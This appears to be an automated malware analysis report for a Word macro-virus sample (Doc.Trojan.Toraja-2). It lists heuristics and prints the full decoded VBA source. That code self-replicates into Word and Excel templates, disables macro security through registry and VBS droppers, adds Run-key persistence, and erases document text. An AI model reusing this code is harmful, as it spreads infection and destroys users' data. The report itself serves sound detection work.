Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fcf766e417d59f2b…

MALICIOUS

Office (OLE)

62.5 KB Created: 2004-07-12 14:52:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 55b17ddba2ce79164534a646126623fb SHA-1: 1dcb878a0b0e61577eeb4e4abb58147ae31639e9 SHA-256: fcf766e417d59f2b08c6791a7fe5514ed523f94ea166c61136654075c19944d9
536 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen and Auto_Open, which are designed to execute automatically. The macros utilize WScript.Shell and CreateObject, along with a Shell() call, strongly suggesting the intent to download and execute a second-stage payload. The ClamAV detection as 'Doc.Trojan.Toraja-2' further supports its malicious nature, though a specific family could not be confidently identified.

Heuristics 12

  • ClamAV: Doc.Trojan.Toraja-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Toraja-2
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "regedit.exe /s \windows.reg", vbHide
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Print #1, "Set WSH = WScript.CreateObject("; """WScript.Shell"""; ")"
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                .VirusProtection = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xlsApp = CreateObject("Excel.Application")
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
    Baru = Application.StartupPath & Application.PathSeparator & "EXCEL" & SN & ".XLS"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14422 bytes
SHA-256: 484fc7bad0f56a2a4c7c6260f455ebe46d17e93944382ed9466c594c8a0c1610
Detection
ClamAV: Doc.Trojan.Toraja-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WEToraja"

Option Compare Text
Dim obj As Variant
Dim x As Variant
Dim sehat As Boolean
Dim actWindow
Public Const app As String = "Application"
Public Const appset As String = "Settings"
Public Const appN As String = "AppName"
Public Const TimerOn = "00:01:00"
Const TempSN As String = "Psychologic"
Const MacID As String = "Toraja"
Const SN As String = "TorajaLand"
Const xlogo As String = "logo"
Global Infeksi As Boolean
Global Active
Global Temp
Global TempPath

Sub RegID()
On Error Resume Next
If GetSetting(app, appset, "TorajaDate") = "" Then SaveSetting app, appset, "TorajaDate", Format(Date + 7, "dd-mm-yyyy")
If GetSetting(app, appset, "Version") <> SN Then SaveSetting app, appset, "Version", SN
If GetSetting(app, appset, "ProgID") <> MacID & SN Then SaveSetting app, appset, "ProgID", "Toraja"
    End Sub

Function Periksa() As Boolean
Application.EnableCancelKey = 0
Dim getDate As Date
On Error Resume Next
getDate = GetSetting(app, appset, "TorajaDate")
If getDate <= Date Then sponsor
End Function

Function objKorban(Sumber, Target) As Boolean
On Error GoTo Lari
sehat = False
For Each obj In Target.VBProject.VBComponents
      If obj.Name = MacID & SN Then sehat = True
      If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "logo") And (obj.Name <> MacID & SN) And _
          (Left(obj.Name, 5) <> "Sheet") And (obj.Name <> "ThisWorkbook") And (Left(obj.Name, 5) <> "Chart") Then
            Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
            objKorban = True
            End If
            Next obj
      If sehat = False Then
        If Infect(Sumber, Target, MacID & SN) And Infect(Sumber, Target, xlogo) = True Then objKorban = True
           
    End If
Lari:
End Function

Sub Sikat()
On Error Resume Next
Set x = Documents
For Each x In Documents
    If x <> ActiveDocument Then
        objKorban ActiveDocument, x
        If Len(x.Path) <> 0 Then x.Save
    End If
Next x
SaveSetting app, appN, "Microsoft Excel", "False"
End Sub

Function Infect(Sumber, Target, obj As String) As Boolean
On Error GoTo ILari
    Sumber.VBProject.VBComponents(obj).Export TempPath & obj
    Target.VBProject.VBComponents.Import TempPath & obj
    Infect = True
    Kill TempPath & obj
Exit Function

ILari:
End Function

Private Sub ExpXls()
Dim xlsApp
Dim sfile As String
If (GetSetting(app, appN, "Microsoft Excel") <> "True") Then
On Error GoTo ELari:
    Set xlsApp = CreateObject("Excel.Application")
    xlsApp.Workbooks.Add
    sfile = xlsApp.StartupPath & xlsApp.PathSeparator & "EXCEL" & SN & ".XLS"
    xlsApp.ActiveWorkbook.SaveAs sfile
    TempPath = Application.NormalTemplate.Path & Application.PathSeparator
    Infect NormalTemplate, xlsApp.Workbooks("EXCEL" & SN & ".XLS"), MacID & SN
    Infect NormalTemplate, xlsApp.Workbooks("EXCEL" & SN & ".XLS"), "logo"
    xlsApp.Workbooks("EXCEL" & SN & ".XLS").VBProject.Name = TempSN & SN
    xlsApp.ActiveWindow.Visible = False
    xlsApp.Workbooks("EXCEL" & SN & ".XLS").Save
    xlsApp.Application.Quit
    SaveSetting app, appN, "Microsoft Excel", "True"
    Set xlsApp = Nothing
End If
ELari:
End Sub

Sub ExpDok()
Dim dokApp
If (GetSetting(app, appN, "Microsoft Word") <> "True") Then
    On Error GoTo DLari
    Set dokApp = CreateObject("Word.Application")
    dokApp.NormalTemplate.OpenAsDocument
    objKorban Workbooks("EXCEL" & SN & ".XLS"), dokApp.ActiveDocument
    dokApp.ActiveDocument.SaveAs ("normal.dot")
    dokApp.ActiveDocument.Close
    dokApp.Application.Quit
    SaveSetting app, appN, "Microsoft Word", "True"
    Set dokApp = Nothing
End If
DLari:
End Sub

Sub ActTemp()
On Error Resume Next
CekApp
If objKorban(Active, Temp) = True Then
       Temp.VBProject.Name = TempSN & SN
       Temp.Save
       SaveSetting app, appN, Application.Name, "True"
       Infeksi = True
    End If
End Sub

Sub TempAct()
On Error Resume Next
CekApp
 If objKorban(Temp, Active) = True Then
       Active.VBProject.Name = MacID
       If Len(Active.Path) <> 0 Then Active.Save
    End If
End Sub
'----------------------- Manipulating command bars and keyboard
Sub MExcel()
On Error Resume Next
For Each x In CommandBars.ActiveMenuBar.Controls("Tools").Controls("Macro").Controls
              x.OnAction = "amd"
Next x
    WEBarC
    CommandBars("Ply").Controls("View Code").Delete
    With Application
            .OnKey "%{F2}", "periksa"
            .OnKey "%{F4}", "periksa"
            .OnKey "%{F8}", "periksa"
            .OnKey "%{F11}", "amd"
            .OnKey "{F12}", "periksa"
            .OnKey "^{o}", "OpenFile"
    End With
CommandBars("Standard").Controls("Open").OnAction = "OpenFile"
CommandBars("Worksheet Menu Bar").Controls("File").Controls("Open...").OnAction = "OpenFile"
End Sub
'Change command bars
Sub WEBarC()
On Error Resume Next
AturCmd CommandBars.ActiveMenuBar, False
AturCmd CommandBars("Formatting"), False
AturCmd CommandBars("Standard"), False
AturCmd CommandBars("Control Toolbox"), True
AturCmd CommandBars("Forms"), True
AturCmd CommandBars("ActiveX Control"), True
AturCmd CommandBars("Visual Basic"), True
End Sub

Sub AturCmd(cmd, param As Boolean)
With cmd
    If param = True Then
        .Enabled = False
        .Visible = False
    End If
End With
End Sub

Sub MWord()
On Error Resume Next
CustomizationContext = NormalTemplate
  With Options
            .VirusProtection = False
            .SaveNormalPrompt = False
    End With
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
    WEBarC
End Sub

Sub w2000()
On Error Resume Next
Siluman
Dhemit
Open "\windows.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[Hkey_Local_Machine\software\microsoft\Windows\CurrentVersion\Run]"
Print #1, """"; "FixSys"; """"; "="; """"; "regedit.exe /s \\windows.reg"; """"
Close #1
On Error Resume Next
Shell "regedit.exe /s \windows.reg", vbHide
End Sub

Sub Siluman()
Open "\autosys.bat" For Output As #1
Print #1, "regedit /s \windows.reg"
Close #1
End Sub
Sub Dhemit()
Open "\sysinfo.ini.vbs" For Output As #1
Print #1, "Dim WSH"
Print #1, "Set WSH = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\10"; "."; "0\Word\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\10"; "."; "0\Excel\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\9"; "."; "0\Word\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\9"; "."; "0\Excel\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "Set WWA = WScript.CreateObject("; """Word.application"""; ")"
Print #1, "WWA.Options.VirusProtection = False"
Print #1, "WWA.Options.SaveNormalPrompt = False"
Print #1, "WWA.Application.Quit"
Close #1
End Sub

Sub AutoExec()
       Application.EnableCancelKey = 0
        Application.DisplayRecentFiles = False
        SaveSetting app, appN, "Microsoft Word", "True"
        w2000
        MWord
        ExpXls
        RegID
        Documents.Add
        Application.OnTime Now + TimeValue(TimerOn), "Pewaktu"
End Sub

Sub AutoNew()
On Error Resume Next
TempAct
End Sub

Sub AutoOpen()
On Error Resume Next
Dim strRun As String

        Application.EnableCancelKey = 0
        ActTemp
        Sikat
        w2000
        MWord
        RegID
        If Infeksi = True Then
            strRun = TempSN & SN & "." & MacID & SN & ".Ketemu"
            Application.OnTime Now + TimeValue("00:01:00"), strRun
       End If
End Sub

Sub FileOpen()
On Error Resume Next
    WordBasic.DisableAutoMacros 1
    Dialogs(80).Show
    TempAct
    WordBasic.DisableAutoMacros 0
End Sub

Sub Auto_Open()
On Error Resume Next
Application.EnableCancelKey = 0
XlsAct
ExpDok
w2000
Application.DisplayRecentFiles = False
End Sub

Private Sub AllWB()
sehat = False
For Each obj In Workbooks
      actWindow = obj.Name
      If actWindow = "EXCEL" & SN & ".XLS" Then sehat = True
      If obj.Path = Application.StartupPath And actWindow <> "EXCEL" & SN & ".XLS" Then
               obj.Close False
               Kill Application.StartupPath & Application.PathSeparator & actWindow
         End If
 Next obj
If sehat = False Then PicuXlsAct
End Sub

Sub XlsAct()
On Error Resume Next
Application.EnableCancelKey = 0
Application.DisplayAlerts = False
TempAct
AllWB
Application.OnSheetActivate = ""
Application.OnSheetDeactivate = ""
Application.OnWindow = ""
MExcel
Application.OnWindow = "EXCEL" & SN & ".XLS" & "!XlsAct"
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub



Sub OpenFile()
On Error Resume Next
Application.DisplayAlerts = False
Application.Dialogs(1).Show
XlsAct
End Sub

Sub PicuXlsAct()
Dim Baru As String
On Error Resume Next
Application.ScreenUpdating = False
Workbooks.Add
Baru = Application.StartupPath & Application.PathSeparator & "EXCEL" & SN & ".XLS"
ActiveWorkbook.SaveAs Baru
ActiveWindow.Visible = False
ActTemp
End Sub

Sub Pewaktu()
    Periksa
    Application.OnTime Now + TimeValue(TimerOn), "Pewaktu"
End Sub

Sub Ketemu()
TempAct
Infeksi = False
End Sub

Sub CekApp()
If Application.Name = "Microsoft Word" Then Doc Else Xls
End Sub
Sub Doc()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Active = ActiveDocument
Set Temp = NormalTemplate
End Sub

Sub Xls()
Set Active = ActiveWorkbook
Set Temp = Workbooks("EXCEL" & SN & ".XLS")
TempPath = Application.TemplatesPath
End Sub

Sub sponsor()
Application.EnableCancelKey = 0
On Error Resume Next
LOGO.Show
End Sub

Sub ToolsCustomizeKeyboard()
right_animate
End Sub

Sub ViewCode()
up_animate
End Sub

Sub ViewVBcode()
wani2
End Sub

Sub ToolsCustomize()
bottom_animate
End Sub

Sub ToolsMacro()
wani2
End Sub

Sub ToolsRecordMacroToggle()
wani2
End Sub

Sub FileTemplates()
left_animate
End Sub

Sub ViewSecurity()
MsgBox (" Well...!! Do you want to change it ?? ask Psychologic to do that !!! ")
left_animate
right_animate
bottom_animate
up_animate
wani2
Periksa
End Sub

Sub wani2()
Application.EnableCancelKey = 0
Dim numchars As Integer
numchars = ActiveDocument.Characters.Count
    Do While x < numchars
    x = x + 1
    Selection.HomeKey Unit:=wdStory
    Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend
    Selection.Cut
Loop
End Sub

Sub amd()
Dim angka
angka = 0
On Error Resume Next
ActiveWindow.Zoom = 80
Rows("1:101").Select
Selection.RowHeight = 23
Range("A1").Select

Do While angka < 17
angka = angka + 1

x = Animate("d", angka)
x = Animate("a", angka)
x = Animate("b", angka)
x = Animate("c", angka)
x = Animate("F", angka)
x = Animate("g", angka)
x = Animate("i", angka)
x = Animate("h", angka)
x = Animate("j", angka)
x = Animate("e", angka)
Loop
End Sub

Function Animate(ax, bx)
Application.EnableCancelKey = 0
Dim x
Dim c
    x = 0
    Do While x < 17
    x = x + 1
    Range(ax & bx).Select
    Selection.Font.ColorIndex = 3
    Selection.Copy
    Range(ax & x).Select
    For c = 1 To 11250
     c = c + 1
    Next
    Loop
    Range(ax & bx).Select
    Selection.Copy
    Range(ax & x).Select
    ActiveSheet.Paste
    Range(ax & bx).Select
    Selection.ClearContents
    Range(ax & bx).Select
End Function

Sub bottom_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 15
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarTop)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 15
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub

Sub left_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 15
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarLeft)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 15
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub

Sub right_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 21
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarRight)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 21
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub

Sub up_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 15
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarBottom)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 15
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub



Attribute VB_Name = "LOGO"
Attribute VB_Base = "0{C86A27B0-D44D-11D8-9C6E-DF5DD9CB4755}{C86A2755-D44D-11D8-9C6E-DF5DD9CB4755}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False